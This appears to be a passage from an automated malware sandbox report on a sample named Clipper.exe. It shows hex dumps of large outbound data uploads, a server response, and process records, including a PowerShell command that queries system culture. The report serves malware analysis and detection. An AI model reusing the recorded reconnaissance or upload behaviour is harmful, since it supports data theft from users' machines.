                      Data Ascii: mJ)Dm$am2H""L2}Of i(d&m$&"hRLZ@$0M$$ $Zkd&$J)d&$lcDLsf^>hj9LM~9~S8piGk=mglPg ""P@P@PPc3
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 84 24 9a cd f3 f3 75 c3 f7 f3 c1 1f f4 c1 8c d3 c4 bf 8e c1 60 fe 6d ba ae f2 c5 5f fc 25 7c d6 35 1f c6 8b 42 e6 59 6c f3 9f c9 36 0f 34 7c ca 29 00 c6 bb 0e f9 97 bc d2 2b bd 12 00 37 de 78 23 ef f9 9e ef c9 5b bf f5 5b f3 4a af f4 4a 7c ca a7 7c 0a 6f fd d6 6f cd 37 7c c3 37 f0 1b bf f1 1b bc e7 7b be 27 5f f4 45 5f c4 d7 7d dd d7 01 f0 8a af f8 8a fc 4b ba 1b 36 01 98 7f fe 39 5e 18 db fc 47 13 cf 9f 6d 5e 24 0e 5e 18 d9 bc 28 6c f3 40 92 00 b0 cd 7f 26 99 67 b1 cd 7f 34 99 e7 60 9b 7f 2b db fc 6b 85 79 be 6c 03 20 fe 7d 6c f3 1f c5 36 ff 5a 25 79 a1 6c f3 c2 58 3c 07 99 e7 60 9b 07 12 ff 76 b6 f9 d7 0a f3 3c 6c f3 1f 45 e6 59 6c f3 40 b6 f9 97 58 01 80 cc f3 65 1b 80 30 cf 97 48 fe 25 b6 b9 9f 24 ee 67 9b 17 95 6d 9e 1f 99 17 99 6d 9e 5b 98 7f 1f 9b
                      Data Ascii: $u`m_%|5BYl64|)+7x#[[JJ||oo7|7{'_E_}K69^Gm^$^(l@&g4`+kyl }l6Z%ylX<`v<lEYl@Xe0H%$gmm[
                      2024-06-01 16:46:58 UTC16384OUTData Raw: b9 d9 26 33 b1 0d 40 44 10 11 14 05 99 89 6d 22 02 00 db d8 06 20 22 b0 0d 80 6d 6c 73 3f 49 04 d0 5a 43 12 00 ad 35 24 21 89 cc a4 94 82 24 6c 93 99 d8 26 22 90 c4 65 69 22 02 80 cc e4 7e 92 b0 0d 80 6d 00 24 11 11 00 64 26 ad 35 a4 42 44 20 89 d6 1a 99 89 24 22 02 00 99 cb 6c f3 dc 24 11 11 4c d3 44 66 12 11 00 d8 46 12 5d d7 01 d0 5a a3 b5 86 24 22 82 88 20 33 69 ad 51 83 cb 6c 03 10 11 44 04 99 c9 34 4d 94 52 00 90 84 24 6c d3 5a 43 12 11 41 66 02 20 89 fb d9 e6 7e 45 41 66 62 9b fb d9 46 12 11 41 66 62 1b 00 49 48 02 20 33 c9 4c 6a ad 48 a2 b5 46 66 52 4a c1 36 b6 29 a5 00 30 4d 13 92 a8 b5 62 9b 69 9a 00 e8 ba 0e 5a 62 9b fb 49 02 40 12 92 68 ad 61 1b 00 49 48 02 20 33 c9 4c 00 4a 29 48 22 33 b1 cd 03 05 42 12 00 b6 b1 8d 24 00 6c d3 5a a3 94 42 44
                      Data Ascii: &3@Dm" "mls?IZC5$!$l&"ei"~m$d&5BD $"l$LDfF]Z$" 3iQlD4MR$lZCAf ~EAfbFAfbIH 3LjHFfRJ6)0MbiZbI@haIH 3LJ)H"3B$lZBD
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 67 b1 cd bf c8 e6 45 61 9b e7 27 cc 7f 09 db 3c 37 db 04 e2 81 6c f3 af 21 5e 38 db bc 30 61 9e c5 36 ff 5a 72 f0 c2 d8 e6 5f 62 9b 17 c4 36 2f 4c 18 64 fe cd 2c 9e c5 36 f7 93 79 1e b6 b9 9f b8 c2 6e 3c 37 49 dc 4f 69 fe 3d 6c f3 c2 88 17 ce 36 cf 4d 12 f7 b3 cd 03 85 79 0e 99 3c 07 99 e7 20 09 00 db 3c 37 db 3c 37 49 3c 90 dd 78 61 02 61 9b fb 49 c2 36 b6 b1 8d 24 24 f1 40 b6 79 20 db dc 4f 12 f7 b3 4d 91 01 b0 8d 24 ee 67 1b db 44 04 b6 b1 cd 03 49 42 12 a4 b1 cd 03 49 02 c0 36 b6 00 b0 0d 80 24 24 71 bf 30 64 26 99 09 80 24 24 71 bf 88 e0 7e b6 79 1e 36 cf 8f 6d 1e 48 12 00 92 00 b0 cd f3 63 1b 00 19 24 d1 5a 43 12 00 b6 01 90 04 80 6d c2 81 24 22 02 49 b4 d6 c8 4c 24 51 4a a1 b5 86 6d ee 17 11 dc cf 36 72 02 60 1b 00 49 00 d8 06 c0 36 f7 b3 cd fd 24
                      Data Ascii: gEa'<7l!^80a6Zr_b6/Ld,6yn<7IOi=l6My< <7<7I<xaaI6$$@y OM$gDIBI6$$q0d&$$q~y6mHc$ZCm$"IL$QJm6r`I6$
                      2024-06-01 16:46:58 UTC16384OUTData Raw: cc 04 40 12 92 b0 8d 6d 00 24 01 90 99 00 48 42 12 92 88 08 22 82 a3 83 03 a2 56 22 02 db d8 06 40 12 b6 99 d5 8e cc 24 33 01 88 08 22 82 cc a4 b5 c6 f3 23 09 49 48 a2 b5 86 6d 00 22 82 88 00 20 33 c9 4c c4 f7 1f 99 ff c1 64 fe 5b d9 e6 85 91 f9 77 b1 f8 8f 61 f3 7c 49 bc 70 01 80 24 fe 2d cc bf 40 e2 32 9b cb 6c fe 35 22 02 00 49 00 48 42 12 92 00 90 c1 36 b6 b1 4d 66 62 1b db 5c 66 73 99 cd 73 12 cf a2 e4 05 09 f3 2f 4a f1 9c 6c 64 5e 28 99 cb 2c fe 43 d9 e6 81 64 fe 43 d9 e6 81 24 71 3f db fc 6b 05 cf c9 36 ff 95 64 9e 83 6d fe 3b d9 e6 5f 43 e6 45 66 9b e7 60 83 c4 bf 87 52 fc 67 92 79 16 db 3c 0f 25 ff 99 6c f3 c2 84 83 7f 0f db 00 48 e2 81 6c f3 a2 90 79 0e b6 f9 97 d8 e6 45 25 07 ff 91 6c f3 40 61 fe 5d 6c f3 c2 c8 3c 8b 6d 00 6c 73 3f 49 bc 30 b2
                      Data Ascii: @m$HB"V"@$3"#IHm" 3Ld[wa|Ip$-@2l5"IHB6Mfb\fss/Jld^(,CdC$q?k6dm;_CEf`Rgy<%lHlyE%l@a]l<mls?I0
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 24 01 60 9b 88 a0 94 c2 34 4d d8 46 12 92 00 c8 4c 00 22 02 00 db dc 4f 12 00 b6 b1 0d 36 a5 14 24 91 99 d8 46 12 00 b6 01 88 08 32 13 db d4 5a 91 c4 34 4d d8 26 22 c8 4c 00 22 02 80 cc 04 20 22 68 ad 11 11 48 02 20 33 b9 9f 24 02 91 99 64 26 f7 93 84 24 6c 53 6b 25 33 01 90 04 80 6d 6c 23 09 49 d8 c6 36 00 b6 b1 0d 80 24 4a 29 64 26 99 c9 fd 6c 03 10 11 44 04 99 89 6d 24 01 90 99 00 44 04 92 68 ad 11 11 44 04 ad 35 00 22 02 db d8 46 12 11 81 6d 6c 63 1b 49 44 04 39 4e 48 22 22 b8 9f 6d ee 67 9b d6 1a a5 14 6a ad 64 26 b6 91 84 6d 00 6c 03 20 09 49 d8 46 12 11 81 f8 81 a5 79 2e 92 b8 9f 6d fe cb d9 dc 2f 10 b6 f9 bf c2 36 0f 24 09 00 49 d8 06 c0 36 92 78 20 db 3c 90 24 fe 47 48 f3 9f c9 36 92 78 7e 6c 23 89 7f 9f e0 45 65 9b 67 b1 b9 4c e6 7e 92 78 b6 40
                      Data Ascii: $`4MFL"O6$F2Z4M&"L" "hH 3$d&$lSk%3ml#I6$J)d&lDm$DhD5"FmlcID9NH""mgjd&ml IFy.m/6$I6x <$GH6x~l#EegL~x@
                      2024-06-01 16:46:58 UTC16384OUTData Raw: bf c7 67 7d c6 a7 f2 45 8f f9 5c 24 01 e0 4c 2e 13 20 81 c4 65 0e 00 24 21 09 49 48 02 40 12 00 b6 b1 8d 6d b0 c9 4c b0 b9 2c 1b 0f 24 9e 93 5b f2 c2 14 99 ef e8 7e 8a f7 78 8f f7 a0 b5 06 80 79 5e bf 7b eb 8a f7 ff c9 7b 79 c6 ee c4 8b e2 41 c7 2b df f6 d6 d7 f0 1a 0f 9e f3 6c 06 00 83 81 ae 56 be ee 1b be 9e 8f 5b bc 17 ff 66 69 fe 33 d9 e6 85 91 f9 77 b1 cd bf 47 38 f8 f7 b0 cd 7f 14 db 3c 37 99 17 4a 12 00 b6 b9 9f 6d 5e 54 c1 0b 67 9b 7f 2d db c8 fc a7 b0 cd 03 c9 fc a7 b3 4d 98 e7 21 89 cc e4 5f 4b 12 cf 92 e2 85 b1 cd bf 47 f0 af 67 9b 17 59 9a ff 48 b6 f9 b7 b2 cd fd 64 5e a8 e0 8a 66 f3 40 c1 0b 27 f3 42 d9 e6 5f 23 cc 0b 65 1b db 3c 90 6d ee 17 88 17 85 6d 6c 03 20 09 49 00 48 c2 36 0f 64 9b fb d9 e6 45 61 1b 00 f1 6c 92 b0 cd 03 85 79 0e b6 01
                      Data Ascii: g}E\$L. e$!IH@mL,$[~xy^{{yA+lV[fi3wG8<7Jm^Tg-M!_KGgYHd^f@'B_#e<mml IH6dEaly
                      2024-06-01 16:46:58 UTC16384OUTData Raw: 4c 53 03 e0 03 7e fa 2c df f7 d7 fb bc e4 75 3d 7f f2 c1 37 f1 dc fe f6 9e 81 77 fc e1 7b 78 c6 ee c4 03 3d e8 78 e5 47 de e9 5a 5e f2 ba 9e e7 f6 ca df 72 27 7f 7b cf c0 bb bf d4 16 df f2 56 a7 01 e8 ba ca 97 7f c5 57 f2 a9 67 3e 18 00 6c 30 60 f3 2c e6 32 f1 82 24 2f 8c cc bf 20 78 20 db fc 47 b2 cd 0b 23 07 cf 8f 6d 00 24 f1 a2 b2 cd 73 b0 41 e2 85 09 f3 42 d9 e6 85 91 79 a1 6c f3 df c9 36 cf 97 0d 80 f8 b7 b3 8d 1c fc bb a4 79 61 24 f1 dc 6c f3 6c c9 7f 26 db 00 84 79 be 24 61 9b 17 95 6d fe 35 c4 0b 67 9b 7f 8f 70 f0 2f b1 cd 0b 22 73 99 6d fe 23 d8 e6 5f 43 e6 39 d8 e6 81 82 17 ce 36 cf 8f cc bf 89 6d 5e 14 b6 01 08 f3 af 62 9b 07 92 f9 57 93 c4 fd 32 93 17 85 78 fe 6c f3 c2 48 c2 36 0f 64 9b fb 29 cd f3 23 73 99 24 6c 63 1b 00 49 00 04 57 24 90 99
                      Data Ascii: LS~,u=7w{x=xGZ^r'{VWg>l0`,2$/ x G#m$sAByl6ya$ll&y$am5gp/"sm#_C96m^bW2xlH6d)#s$lcIW$
                      2024-06-01 16:46:59 UTC389INHTTP/1.1 200 OK
                      Server: nginx/1.18.0
                      Date: Sat, 01 Jun 2024 16:46:59 GMT
                      Content-Type: application/json
                      Content-Length: 1272
                      Connection: close
                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:46:43
                      Start date:01/06/2024
                      Path:C:\Users\user\Desktop\Clipper.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\Clipper.exe"
                      Imagebase:0x7ff6c6490000
                      File size:2'269'184 bytes
                      MD5 hash:A0A3146B324C02ED258E040E035BCEC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:12:46:44
                      Start date:01/06/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                      Imagebase:0x7ff7be880000
                      File size:452'608 bytes
                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:12:46:44
                      Start date:01/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      No disassembly